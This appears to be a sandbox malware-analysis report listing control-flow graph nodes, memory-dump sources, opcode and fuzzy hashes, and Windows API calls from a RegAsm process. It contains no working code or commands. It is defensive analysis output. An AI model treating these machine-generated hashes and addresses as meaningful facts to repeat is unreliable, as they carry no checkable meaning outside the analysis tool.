1498->1458 1524 68c622d-68c622f 1522->1524 1523->1524 1524->1453 1525 68c6231-68c6236 1524->1525 1526 68c6238-68c6242 1525->1526 1527 68c6244 1525->1527 1528 68c6249-68c624b 1526->1528 1527->1528 1528->1453 1529 68c624d-68c6259 1528->1529 1529->1453
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2540310464.00000000068C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_68c0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $q$$q
                                                                    • API String ID: 0-3126353813
                                                                    • Opcode ID: 34916b7062584d1b3bd08e4d391e9047bc95bf3632c2175d39870bd174214ddb
                                                                    • Instruction ID: cfffff63851136b70b7b9503a7d3213da77d693f0def17ea193a56467ed7a80e
                                                                    • Opcode Fuzzy Hash: 34916b7062584d1b3bd08e4d391e9047bc95bf3632c2175d39870bd174214ddb
                                                                    • Instruction Fuzzy Hash: EB029130B002198FDB54DB69D494A6EBBE2FF84324F14852DE516DB395EB71EC82CB81

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1531 68ce0d9-68ce0e6 1532 68ce0ee-68ce0fa 1531->1532 1533 68ce0e8-68ce0ed 1531->1533 1534 68ce0fc-68ce129 call 68cd1b8 call 68cd094 1532->1534 1535 68ce15e-68ce165 1532->1535 1533->1532 1542 68ce12e-68ce13b 1534->1542 1544 68ce13d-68ce156 1542->1544 1545 68ce166-68ce1cd 1542->1545 1544->1535 1555 68ce1cf-68ce1d1 1545->1555 1556 68ce1d6-68ce1e6 1545->1556 1557 68ce475-68ce47c 1555->1557 1558 68ce1ed-68ce1fd 1556->1558 1559 68ce1e8 1556->1559 1561 68ce45c-68ce46a 1558->1561 1562 68ce203-68ce211 1558->1562 1559->1557 1565 68ce47d-68ce4f6 1561->1565 1567 68ce46c-68ce46e 1561->1567 1562->1565 1566 68ce217 1562->1566 1566->1565 1568 68ce42c-68ce44e 1566->1568 1569 68ce2ce-68ce2ef 1566->1569 1570 68ce40f-68ce42a 1566->1570 1571 68ce2a8-68ce2c9 1566->1571 1572 68ce347-68ce36f 1566->1572 1573 68ce3e1-68ce40d 1566->1573 1574 68ce282-68ce2a3 1566->1574 1575 68ce21e-68ce230 1566->1575 1576 68ce31a-68ce342 1566->1576 1577 68ce25b-68ce27d 1566->1577 1578 68ce2f4-68ce315 1566->1578 1579 68ce374-68ce3b1 1566->1579 1580 68ce235-68ce256 1566->1580 1581 68ce3b6-68ce3dc 1566->1581 1582 68ce450-68ce45a 1566->1582 1567->1557 1568->1557 1569->1557 1570->1557 1571->1557 1572->1557 1573->1557 1574->1557 1575->1557 1576->1557 1577->1557 1578->1557 1579->1557 1580->1557 1581->1557 1582->1557
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2540310464.00000000068C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_68c0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Xq$$q
                                                                    • API String ID: 0-855381642
                                                                    • Opcode ID: de7738f88fa2d44560ecfb44dd71a44f77ffc88c8f27475df607ce1392905e5b
                                                                    • Instruction ID: 5180ccdb02afb5547d278db51c12828e147bcd0b31699dd86233272582ac0cc5
                                                                    • Opcode Fuzzy Hash: de7738f88fa2d44560ecfb44dd71a44f77ffc88c8f27475df607ce1392905e5b
                                                                    • Instruction Fuzzy Hash: A4B19474B052189FDB68EF79985927E7BA7BFC8710B05842EE446DB384DE38DC028791
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2538140537.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_2ea0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ab0765f421de567e7404edd0b89256cc387a61d27182d58897009b9e5402c4d1
                                                                    • Instruction ID: 424ddcc5785f063d275822fdff854ec4c3c7a7573c16805e2958299aae2bbf2b
                                                                    • Opcode Fuzzy Hash: ab0765f421de567e7404edd0b89256cc387a61d27182d58897009b9e5402c4d1
                                                                    • Instruction Fuzzy Hash: 52333031D107198EDB11EF68C8906ADF7B1FF99300F15D79AE458AB211EB70AAC5CB81
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2540310464.00000000068C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_68c0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $
                                                                    • API String ID: 0-3993045852
                                                                    • Opcode ID: 2c8cc97b8c5ff8c9416777facee4396c357b39b40411c6357100c73c66faa7e8
                                                                    • Instruction ID: c15e0f2e70115248ea3df51bd913c30e562fbfcfba53a3d94049b27a2b85ed29
                                                                    • Opcode Fuzzy Hash: 2c8cc97b8c5ff8c9416777facee4396c357b39b40411c6357100c73c66faa7e8
                                                                    • Instruction Fuzzy Hash: 8722B175E002148FDF64DBA8D480AAEBBB2EF85320F24C56ED555EB354DA35DC42CB90
                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(000000FF), ref: 00443C36
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2536620293.0000000000440000.00000040.80000000.00040000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_440000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID:
                                                                    • API String ID: 2167126740-0
                                                                    • Opcode ID: f500f262ec5961526e4bec237fbdb824c8a97f65e2ddfece5bcd30e33af1fce6
                                                                    • Instruction ID: 9bde38b72dc5e86b7cdac38d49b4bd5c2099dce41427bf9d8239d6abf1d74f95
                                                                    • Opcode Fuzzy Hash: f500f262ec5961526e4bec237fbdb824c8a97f65e2ddfece5bcd30e33af1fce6
                                                                    • Instruction Fuzzy Hash: 37A0021210D59B6435513AE90D5052591940E55B7633407122433E00D0DD0CC342202B
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2540310464.00000000068C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_68c0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0f895644444de14d57d2b071436e04ea5b5f4d5ade9c8c901354cbcddcdd5cb3
                                                                    • Instruction ID: 6ca2124dc19e3dd19f3a64dc7543167bfef0a72cec621aa3674edc05ed035000
                                                                    • Opcode Fuzzy Hash: 0f895644444de14d57d2b071436e04ea5b5f4d5ade9c8c901354cbcddcdd5cb3
                                                                    • Instruction Fuzzy Hash: BA924534E00204CFDBA4DB68C588B6DBBB2EB45364F5484A9E549EB351DB36EC85CF81
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2540310464.00000000068C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_68c0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5783b157746547aaf1f13d0c1515f0914bbfa90d79ae8cd19c1f226b9f83aac8
                                                                    • Instruction ID: d15ddc8bfb45c12535f46b7e8cbe591eff52c81b44f6b25723767dfb6c936be8
                                                                    • Opcode Fuzzy Hash: 5783b157746547aaf1f13d0c1515f0914bbfa90d79ae8cd19c1f226b9f83aac8
                                                                    • Instruction Fuzzy Hash: D4629D34A002089FDB64DB68D5A4BADBBF2FF84324F148569E506DB355DB31EC86CB81
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2540310464.00000000068C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_68c0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 00dbb4b64905a0ec1bf7c1dbea09aa5b7d1d3042704f6c9a7b3dc70c89e64216
                                                                    • Instruction ID: 01149f7b683a8fd5104e39170cc9ce536677448b1f67e91356b9b3cca6f4a6e7
                                                                    • Opcode Fuzzy Hash: 00dbb4b64905a0ec1bf7c1dbea09aa5b7d1d3042704f6c9a7b3dc70c89e64216
                                                                    • Instruction Fuzzy Hash: AF325034B002189FDB68EF69D890BADBBB2FB88314F108529E505DB355DB35EC46CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2540310464.00000000068C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_68c0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1fa8cb46040ce1b8ecd534fb05742c5d760fa7c5593141f437c25c72d9e72eba
                                                                    • Instruction ID: bf301f10cfd50ba3cfc0376b109c9452f7123f8526b1e79188613b59fe7248e8
                                                                    • Opcode Fuzzy Hash: 1fa8cb46040ce1b8ecd534fb05742c5d760fa7c5593141f437c25c72d9e72eba
                                                                    • Instruction Fuzzy Hash: 80227334E002098FEF64DB68D490BADB7B5FB49320F6485A9E519EB395CB34DC81CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2538140537.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_2ea0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fe952f46ada07f0fe70858f836d785c8b9c7e6d511422545b8e8e6d292a2965a
                                                                    • Instruction ID: 82e0ab6b461c04a976caa1783a3e5d4acd9b5fc31125692285119cb6ed7b9318
                                                                    • Opcode Fuzzy Hash: fe952f46ada07f0fe70858f836d785c8b9c7e6d511422545b8e8e6d292a2965a
                                                                    • Instruction Fuzzy Hash: F6B16270E402098FDB24CFA9D8A17DDBBF2AF48318F14D529D415EB294EBB4A845CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2538140537.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_2ea0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c7c311bc0e19e4da414ccb209f2aeb900fc09b82c713938865fbd00940a8f58f
                                                                    • Instruction ID: 9960bbc3799c3f45331ca393e87bb68aeed9ca48a9ac19b0673b6e94734c103f
                                                                    • Opcode Fuzzy Hash: c7c311bc0e19e4da414ccb209f2aeb900fc09b82c713938865fbd00940a8f58f
                                                                    • Instruction Fuzzy Hash: 85917C70E403099FDF24CFA9C9917DEBBF2AF88308F14D129E415AB294DB74A845CB91

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 2325 6a1d490-6a1d494 2326 6a1d496-6a1d49c 2325->2326 2326->2326 2327 6a1d49e-6a1d4a4 2326->2327 2328 6a1d4a6-6a1d4cd 2327->2328 2329 6a1d4de-6a1d556 2327->2329 2330 6a1d4d5-6a1d4d6 2328->2330 2331 6a1d4d0 call 6a1a464 2328->2331 2333 6a1d561-6a1d568 2329->2333 2334 6a1d558-6a1d55e 2329->2334 2331->2330 2335 6a1d573-6a1d612 CreateWindowExW 2333->2335 2336 6a1d56a-6a1d570 2333->2336 2334->2333 2338 6a1d614-6a1d61a 2335->2338 2339 6a1d61b-6a1d653 2335->2339 2336->2335 2338->2339 2343 6a1d660 2339->2343 2344 6a1d655-6a1d658 2339->2344 2345 6a1d661 2343->2345 2344->2343 2345->2345
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2540504591.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_6a10000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 55525af9af50728654093cb960906b9ea4c092bdad77bc353f47cfaf91890a94
                                                                    • Instruction ID: 5e514eb5ad44adbb67455535f4887157c9b4c66430fd54a31990b254e242a3cc
                                                                    • Opcode Fuzzy Hash: 55525af9af50728654093cb960906b9ea4c092bdad77bc353f47cfaf91890a94
                                                                    • Instruction Fuzzy Hash: 9751FCB1C10249AFDF15DF99C980ADDBFB2BF49314F25816AE958AB220D7319885CF90

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 2346 68ce571-68ce58b 2347 68ce58d-68ce5b4 call 68cd1c8 2346->2347 2348 68ce5b5-68ce5d4 call 68cd1d4 2346->2348 2354 68ce5da-68ce639 2348->2354 2355 68ce5d6-68ce5d9 2348->2355 2362 68ce63f-68ce656 2354->2362 2363 68ce63b-68ce63e 2354->2363 2365 68ce65e-68ce6cc GlobalMemoryStatusEx 2362->2365 2366 68ce658-68ce65d 2362->2366 2368 68ce6ce-68ce6d4 2365->2368 2369 68ce6d5-68ce6fd 2365->2369 2366->2365 2368->2369
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2540310464.00000000068C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_68c0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1a22b1af2462166c712ab92f8c9c83460a9e6abe6d8875f6797a5e14087ec929
                                                                    • Instruction ID: 0fb87a4330d3c8db86f9ff4aea1889676040e6281d2405fc7e6217aaba431e54
                                                                    • Opcode Fuzzy Hash: 1a22b1af2462166c712ab92f8c9c83460a9e6abe6d8875f6797a5e14087ec929
                                                                    • Instruction Fuzzy Hash: 6E411572D043498FCB14DF69D8047EEBBF1AF85220F15856ADA05E7281EB349845CBD1

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 2372 6a1a464-6a1d556 2374 6a1d561-6a1d568 2372->2374 2375 6a1d558-6a1d55e 2372->2375 2376 6a1d573-6a1d612 CreateWindowExW 2374->2376 2377 6a1d56a-6a1d570 2374->2377 2375->2374 2379 6a1d614-6a1d61a 2376->2379 2380 6a1d61b-6a1d653 2376->2380 2377->2376 2379->2380 2384 6a1d660 2380->2384 2385 6a1d655-6a1d658 2380->2385 2386 6a1d661 2384->2386 2385->2384 2386->2386
                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06A1D602
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2540504591.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_6a10000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0
                                                                    • Opcode ID: 9a4e69ca340058dfbc2c656c7e4da65c8ad648f947a6b921d47eed933d362802
                                                                    • Instruction ID: d60e8078d2c6f1b93fb0ab2ce91831c4648c30929a9a91cf17eb2e7042af15cc
                                                                    • Opcode Fuzzy Hash: 9a4e69ca340058dfbc2c656c7e4da65c8ad648f947a6b921d47eed933d362802
                                                                    • Instruction Fuzzy Hash: F851BEB1D103099FDB14DF99C984ADEBFB5FF88310F64812AE819AB210DB75A845CF90

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 2387 6a1e46c-6a1fc6c 2390 6a1fc72-6a1fc77 2387->2390 2391 6a1fd1c-6a1fd3c call 6a1a48c 2387->2391 2392 6a1fc79-6a1fcb0 2390->2392 2393 6a1fcca-6a1fd02 CallWindowProcW 2390->2393 2399 6a1fd3f-6a1fd4c 2391->2399 2400 6a1fcb2-6a1fcb8 2392->2400 2401 6a1fcb9-6a1fcc8 2392->2401 2395 6a1fd04-6a1fd0a 2393->2395 2396 6a1fd0b-6a1fd1a 2393->2396 2395->2396 2396->2399 2400->2401 2401->2399
                                                                    APIs
                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 06A1FCF1
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2540504591.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_6a10000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID: CallProcWindow
                                                                    • String ID:
                                                                    • API String ID: 2714655100-0
                                                                    • Opcode ID: 668c3d55afb1985273fa9cae75dab77e869b8cae097a7576311c7bd6013bdad9
                                                                    • Instruction ID: 00dffaab3d9964e5977c25868c88af45c34ad8a0c97ebe4ebdfd0b7591cbc1b9
                                                                    • Opcode Fuzzy Hash: 668c3d55afb1985273fa9cae75dab77e869b8cae097a7576311c7bd6013bdad9
                                                                    • Instruction Fuzzy Hash: 0E414AB49003498FDB54DF99C849AAABBF5FF88314F24C459D919AB320D734A841CBA4

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 2404 68ce658-68ce696 2406 68ce69e-68ce6cc GlobalMemoryStatusEx 2404->2406 2407 68ce6ce-68ce6d4 2406->2407 2408 68ce6d5-68ce6fd 2406->2408 2407->2408
                                                                    APIs
                                                                    • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000068E), ref: 068CE6BF
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2540310464.00000000068C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_68c0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID: GlobalMemoryStatus
                                                                    • String ID:
                                                                    • API String ID: 1890195054-0
                                                                    • Opcode ID: 2c455194e01b647792d9b2ff9490bd33fc44b43c6d07dad3ee0807ef7ec9be4a
                                                                    • Instruction ID: dee8f85635c87ffe84fa7f6e4d176f86ab9bde6c87b833a9f578034f137052c4
                                                                    • Opcode Fuzzy Hash: 2c455194e01b647792d9b2ff9490bd33fc44b43c6d07dad3ee0807ef7ec9be4a
                                                                    • Instruction Fuzzy Hash: 771123B1C0065A9BCB20DF9AC944BDEFBF4AF48320F14812AD918A7240D778A945CFA5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2538140537.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_2ea0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LRq
                                                                    • API String ID: 0-3187445251
                                                                    • Opcode ID: 664039b29470c69dcfa18184a77975e7030c79aca337b71841f404bf37ab1890
                                                                    • Instruction ID: 57b1fa6a638f48e8eb09cbf54b9813c9aa7d3e4921fa7d737e312fbc8b9532d0
                                                                    • Opcode Fuzzy Hash: 664039b29470c69dcfa18184a77975e7030c79aca337b71841f404bf37ab1890
                                                                    • Instruction Fuzzy Hash: 43518F34750214CFDB14DB69C468AAE77F6BF89704F2480A9E406EF3A4CB75AC41CBA1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2538140537.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_2ea0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LRq
                                                                    • API String ID: 0-3187445251
                                                                    • Opcode ID: 03738c09b341170a38c8aabefbc46a47c0c3251c1a2997030216ad6348a4d6a5
                                                                    • Instruction ID: edca7b8cecb9737660e59ba409107a0370469f1f73aded2b553f8475e99a01d9
                                                                    • Opcode Fuzzy Hash: 03738c09b341170a38c8aabefbc46a47c0c3251c1a2997030216ad6348a4d6a5
                                                                    • Instruction Fuzzy Hash: 68316E30E502099BDB14CF69C5607AEF7B2EF86304F20D929E802EF250EB74AD418B51
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2538140537.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_2ea0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LRq
                                                                    • API String ID: 0-3187445251
                                                                    • Opcode ID: ed7f6c5dab648b7c83028cd14acd04c5ebad7144006316a22db14d259f30a644
                                                                    • Instruction ID: 952ac2d7f262aec8b4d53ba074bd1829d0d8f474b173c94602c28c81466f3b16
                                                                    • Opcode Fuzzy Hash: ed7f6c5dab648b7c83028cd14acd04c5ebad7144006316a22db14d259f30a644
                                                                    • Instruction Fuzzy Hash: 2C313A31E50219DBDB14DFA9C5607AEF7B2EF85314F10D52AE906EF240EBB0AD418B91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2538140537.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_2ea0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LRq
                                                                    • API String ID: 0-3187445251
                                                                    • Opcode ID: c3624f4c677aaa65f7820074c4573bc3e28c2d85f458675e3b593b0500b7b80a
                                                                    • Instruction ID: 0bf6f9f98fdf5403a350493c134277c797caf6bde0fd19a283887ca54be40939
                                                                    • Opcode Fuzzy Hash: c3624f4c677aaa65f7820074c4573bc3e28c2d85f458675e3b593b0500b7b80a
                                                                    • Instruction Fuzzy Hash: AC01B1317002145FC704AB7D84247AEBFBAEFC6710F54816AE406CB784DE3598028795
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2538140537.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_2ea0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LRq
                                                                    • API String ID: 0-3187445251
                                                                    • Opcode ID: 79bb85e83749d80d53b0ff4069c421b422b785a72bba7123ef17795974f28ccc
                                                                    • Instruction ID: b8782ba693d0fa792a65f13a505285386a2e02be2bb0d16f85c22b50459d8d99
                                                                    • Opcode Fuzzy Hash: 79bb85e83749d80d53b0ff4069c421b422b785a72bba7123ef17795974f28ccc
                                                                    • Instruction Fuzzy Hash: 5F0121717002149FC704AB7CC0217AEBBA6EFCA320F10C56EE00ACB780DE3598028B96
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2538140537.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_2ea0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 87058196cf4a0a7c2bc3a4f23e182f8d48118bda24cdc019fb9123bdcd27d80e
                                                                    • Instruction ID: cb49fa6282fe5252c26b4a8a349de5ba71e304f71000daab0401fc27a5f3eb16
                                                                    • Opcode Fuzzy Hash: 87058196cf4a0a7c2bc3a4f23e182f8d48118bda24cdc019fb9123bdcd27d80e
                                                                    • Instruction Fuzzy Hash: 16829E38B002248FCB59FF29D590A6E77B6EB88311F108669E916EB358DF31AD45CF41
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2538140537.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_2ea0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 70fa0df7c2a6f0d14abf1d78349c584a3ae9b1a7da7520e3d9ac0bd6dd648fa3
                                                                    • Instruction ID: b55a8ee19362bae029a5ef12968fbc1f5627a3544c4d6b60884d99c1a730e258
                                                                    • Opcode Fuzzy Hash: 70fa0df7c2a6f0d14abf1d78349c584a3ae9b1a7da7520e3d9ac0bd6dd648fa3
                                                                    • Instruction Fuzzy Hash: D7828E38B002248FCB59FF29D590A6E77B6EB88311F108669E916EB358DF31AD45CF41
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2538140537.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_2ea0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 52ac4bf1fbd91058d7b90b8eff9379ff34677e4d82bb8c439ddc7a9e98527798
                                                                    • Instruction ID: 48b334016d3602952698906424ecc40b6162b0c79bd02eb7c0e7eab3314b09b0
                                                                    • Opcode Fuzzy Hash: 52ac4bf1fbd91058d7b90b8eff9379ff34677e4d82bb8c439ddc7a9e98527798
                                                                    • Instruction Fuzzy Hash: 22229B70B013168FDB66EB38D4A861977A3FB85209B509A39E506CF354CF71EC478B92
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2538140537.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_2ea0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3946eb06d030eaacacca335032301117120f67b05c93d7f1bcc6d8beb200bdad
                                                                    • Instruction ID: 0c5131b8f3b8a7a653927113010a4abfb28337ab23023c32aa1d3f4bc0af4b5e
                                                                    • Opcode Fuzzy Hash: 3946eb06d030eaacacca335032301117120f67b05c93d7f1bcc6d8beb200bdad
                                                                    • Instruction Fuzzy Hash: 2EA17E70E40209CFDB20CFA9D8A17DDBBF1AF48318F14D529D415EB294EBB4A885CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2538140537.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_2ea0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 940d2f90234159d5e2973c854b351fbde322802d744e6a327f04004d89ae51e0
                                                                    • Instruction ID: 25b597804ffa4cadf564448bafc28c18f35a809b486051472b2b7a2900fd15b3
                                                                    • Opcode Fuzzy Hash: 940d2f90234159d5e2973c854b351fbde322802d744e6a327f04004d89ae51e0
                                                                    • Instruction Fuzzy Hash: C6A14D34A003049FDB14DFA8D894AADBBB2EF88315F249569F906DB354DB31EC42CB50
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2538140537.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_2ea0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f193e5e86cbf67752e23923dfe7edadf1100a25f41b7e2316fe0eda0074dd135
                                                                    • Instruction ID: beac948c514a0250f5b2d4dc4a43a388f32276ba22fa6cdb4320c24d4e9c38b1
                                                                    • Opcode Fuzzy Hash: f193e5e86cbf67752e23923dfe7edadf1100a25f41b7e2316fe0eda0074dd135
                                                                    • Instruction Fuzzy Hash: 70917CB0E40209DFDF20CFA9C9917DDBBF2AF58318F24D129E414AB294DB74A845CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2538140537.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_2ea0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b4ca432f8cd04fa6f20bff050483b99c98b0c13c65e6499fe26ad630ffa24daa
